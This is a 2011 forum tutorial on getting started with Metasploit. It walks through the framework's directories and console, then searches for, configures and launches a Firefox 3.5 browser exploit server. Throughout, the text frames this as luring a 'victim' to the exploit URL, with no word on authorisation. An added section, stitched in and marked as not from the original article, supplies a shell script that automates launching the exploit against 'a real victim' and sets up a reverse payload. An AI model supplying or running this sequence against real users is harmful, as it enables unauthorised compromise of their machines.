Go4Expert, Ethical hacking Tips: How to get started with Metasploit (http://www.go4expert.com/articles/started-metasploit-t24743/)

lionaneesh 26Jan2011 20:11

How to get started with Metasploit
Metasploit is a penetration-testing framework: a collection of exploits, payloads, auxiliary tools and the libraries and data they depend on, together with the accumulated knowledge of how to use them. It is a boon to pen-testers, exploit developers and hackers alike.

The project was started by H.D. Moore and is now an open-source project managed by Rapid7.

Download and installation instructions are on the Metasploit project site.

I will use my Ubuntu 10.10 OS for the code samples. So, some commands may be different on other OS versions, and if you have queries or questions please don't hesitate to post in the comments below.

The directory structure

Metasploit has a self-explanatory, user-friendly directory structure.

On Linux the installer puts Metasploit under /opt/metasploit3; the framework itself lives in the msf3 subdirectory:

aneesh@aneesh-laptop:~$ cd /opt/metasploit3/

Let's see the different directories:

aneesh@aneesh-laptop:/opt/metasploit3$ ls
app  bin  env.sh  lib  msf3  run.sh
aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls
armitage       HACKING  msfconsole  msfgui       msfpescan  plugins  tools
data           lib      msfd        msfmachscan  msfrpc     README
documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts
external       msfcli   msfencode   msfpayload   msfupdate  test


The data directory: contains the static data that modules need at run time, such as PHP sources, wordlists, the Meterpreter and VNC DLLs, and the HTML and binary templates that exploits and payloads are built from.


aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/
aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls
armitage             isight.bundle            passivex   vncdll.dll
eicar.com            java                     php        vncdll.x64.dll
eicar.txt            lab                      post       wmap
emailer_config.yaml  meterpreter              snmp       wordlists
exploits             msfcrawler               sounds
gui                  msflinker_linux_x86.bin  sql
ipwn                 msfpescan                templates

The lib directory: the name is self-explanatory; it is the directory that holds the Ruby libraries (the Rex and Msf libraries) that the framework and its modules are built on.

The directory of greatest use to us is the modules directory:

aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules
aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls
auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post


  • The exploits dir: contains the exploit modules, organised by platform (windows, linux, multi, ...) and then by service or target type (browser, smb, ...)
  • The encoders dir: contains the encoders that transform a payload, for example to avoid bad characters that the target would mangle or to defeat simple signature matching
  • The auxiliary dir: contains modules that are not exploits but are useful during a pen-test, such as scanners, fuzzers, sniffers and denial-of-service modules
  • The payloads and nops dirs: provide the shellcode that runs after successful exploitation (code execution) and the NOP-sled generators used to pad it
  • The post dir: contains post-exploitation modules that are run on a host you have already compromised

Getting to know Metasploit

Metasploit can be driven through several interfaces. The four main ones are:
  1. msfweb (the web interface; note that it no longer ships with this version and is absent from the msf3 listing above)
  2. msfgui (the graphical user interface)
  3. msfconsole (the console interface)
  4. msfcli (the command-line interface)
The most powerful and most used interface is the console, so we'll use it throughout this tutorial.

To open Metasploit just type 'msfconsole' in your shell and you should get output similar to this:

aneesh@aneesh-laptop:~$ msfconsole
                                 | |      o
 _  _  _    _ _|_  __,  ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/


       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 643 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11647 updated today (2011.01.26)

msf >

Now that we know how to open Metasploit, let's look at some of its modules.

Several commands help with this:

The show command lists the modules of a type: show exploits, show auxiliary, show payloads, or show all for everything
The search command looks for a pattern in the loaded modules: search (pattern)

For example:

Let's search for Firefox exploits and see what is in store for us:


msf > search firefox
[*] Searching loaded modules for pattern 'firefox'...

   Name                                              Disclosure Date  Rank       Description
   ----                                              ---------------  ----       -----------
   multi/browser/firefox_escape_retval               2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption
   multi/browser/firefox_queryinterface              2006-02-02       normal     Firefox location.QueryInterface() Code Execution
   multi/browser/mozilla_compareto                   2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
   multi/browser/mozilla_navigatorjava               2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
   windows/browser/apple_quicktime_rtsp              2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
   windows/browser/awingsoft_winds3d_sceneurl        2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
   windows/browser/dxstudio_player_exec              2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
   windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)

msf >

You will notice that all of the results are browser exploits, and some may be useful to us. Note that search matches the pattern against descriptions and target names as well as module names, which is why modules such as the QuickTime and ANI exploits, whose names do not mention Firefox, also appear.

This is the power of Metasploit!

Let's use the 'use' command to select an exploit.

Syntax:

use (path)

Output:

msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) >

Now let's see the options:

show options

Output:

msf exploit(firefox_escape_retval) > show options

Module options (exploit/multi/browser/firefox_escape_retval):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST                      yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Firefox 3.5.0 on Windows XP SP0-SP3

Let us now set the options. This is done with:

set (option name) (value)

Now let's set some options according to our needs:

msf exploit(firefox_escape_retval) > set SRVHOST localhost
SRVHOST => localhost
msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH /exploit
URIPATH => /exploit

Explanations:
  1. 'set SRVHOST localhost' sets the address on which the exploit's web server is hosted. With localhost (the loopback interface) only a browser on this same machine can reach the page; to serve a victim elsewhere on the network, set SRVHOST to an address of yours that the victim can reach.
  2. 'set SRVPORT 80' sets the port on which the server listens. Port 80 is the default for web servers, so the victim's URL needs no port number; on Linux, binding a port below 1024 requires root (or the CAP_NET_BIND_SERVICE capability), so if you are not root leave the default of 8080.
  3. 'set URIPATH /exploit' sets the path under which the exploit page is served, instead of the random one used by default.

No payload was chosen here, so the module uses its default payload together with that payload's own default settings (for a reverse payload, LHOST and LPORT). Use 'show payloads' to list the payloads compatible with this exploit and 'set PAYLOAD (name)' to pick one.

This means that we have to get the victim to open the page at the URL http://localhost/exploit for the exploit to work!

Now that the options are set, let's run the exploit.

This is done with:

exploit

Output:

msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on
[*] Using URL: http://localhost:80/exploit
[*] Server started.

The output shows that the exploit server started successfully.

Now the work gets a lot easier: we just have to get a user running the vulnerable browser (Firefox 3.5.0 on Windows XP, per the target list above) to open this link, and the module delivers the payload to it.

I hope this is enough to get you started working with Metasploit...
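The use / set / exploit sequence above can be scripted instead of typed, which matters once you repeat it in an engagement. The following POSIX shell script is an added example (not from the original article or the Metasploit project): it writes the tutorial's commands into an msfconsole resource script and runs it with `msfconsole -r`, after two pre-flight checks a practitioner wants, namely that a port below 1024 needs root and that a loopback SRVHOST is unreachable from any other host. It assumes that the module's default payload is a reverse payload (so it also sets LHOST to the serving address) and that msfconsole is on PATH; by default it only prints the generated script, and starts msfconsole only when MSF_LAUNCH=1 is set.

```shell
#!/bin/sh
# Added example, not from the original article or the Metasploit project.
# Automates the use / set / exploit sequence from the tutorial with an
# msfconsole resource script (msfconsole -r file.rc), after two pre-flight
# checks: a port below 1024 needs root, and a loopback SRVHOST is only
# reachable from this machine. ASSUMPTIONS: the module's default payload is
# a reverse payload (so LHOST matters) and msfconsole is on PATH. Set
# MSF_LAUNCH=1 to actually start msfconsole; by default the generated
# resource script is only printed.

# True (0) when binding port $1 needs root, i.e. it is a privileged port and
# the caller's uid ($2) is not 0. On Linux the alternative is the
# CAP_NET_BIND_SERVICE capability.
needs_root() {
    [ "$1" -lt 1024 ] && [ "$2" -ne 0 ]
}

# True (0) when $1 is a loopback address: a victim on another host can
# never reach http://localhost/... or http://127.x.x.x/...
is_loopback() {
    case "$1" in
        localhost|127.*|::1) return 0 ;;
        *) return 1 ;;
    esac
}

# Write the resource script. Each line is exactly what you would type at
# the msf > prompt; "exploit -j" starts the server as a background job.
# LHOST is set to the serving address (ASSUMPTION: reverse default payload).
write_rc() {
    rcfile="$1"; srvhost="$2"; srvport="$3"; uripath="$4"
    cat > "$rcfile" <<EOF
use exploit/multi/browser/firefox_escape_retval
set SRVHOST $srvhost
set SRVPORT $srvport
set URIPATH $uripath
set LHOST $srvhost
show options
exploit -j
EOF
}

# Values from the tutorial unless overridden in the environment.
SRVHOST="${MSF_SRVHOST:-localhost}"
SRVPORT="${MSF_SRVPORT:-80}"
URIPATH="${MSF_URIPATH:-/exploit}"

if needs_root "$SRVPORT" "$(id -u)"; then
    echo "warning: port $SRVPORT is privileged; run as root or use SRVPORT 8080" >&2
fi
if is_loopback "$SRVHOST"; then
    echo "warning: SRVHOST $SRVHOST is loopback; only a browser on this host can reach http://$SRVHOST:$SRVPORT$URIPATH" >&2
fi

RC="$(mktemp /tmp/firefox_escape_retval.XXXXXX)"
write_rc "$RC" "$SRVHOST" "$SRVPORT" "$URIPATH"

if [ "${MSF_LAUNCH:-0}" = 1 ] && command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$RC"    # -q: skip the banner, -r: run the resource script
else
    echo "resource script written to $RC:"; cat "$RC"
fi
```

Run it as `MSF_SRVHOST=<your reachable address> MSF_SRVPORT=8080 MSF_LAUNCH=1 sh firefox_escape_retval.sh` to serve a real victim without root; the console stays open after the resource script finishes, so you can watch sessions arrive as you would after typing the commands by hand.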

lionaneesh 27Jan2011 16:46

Re: How to get started with Metasploit
Thanks Shabbir...
For accepting my articles and making it much better with the edits...

Thanks a ton!!!
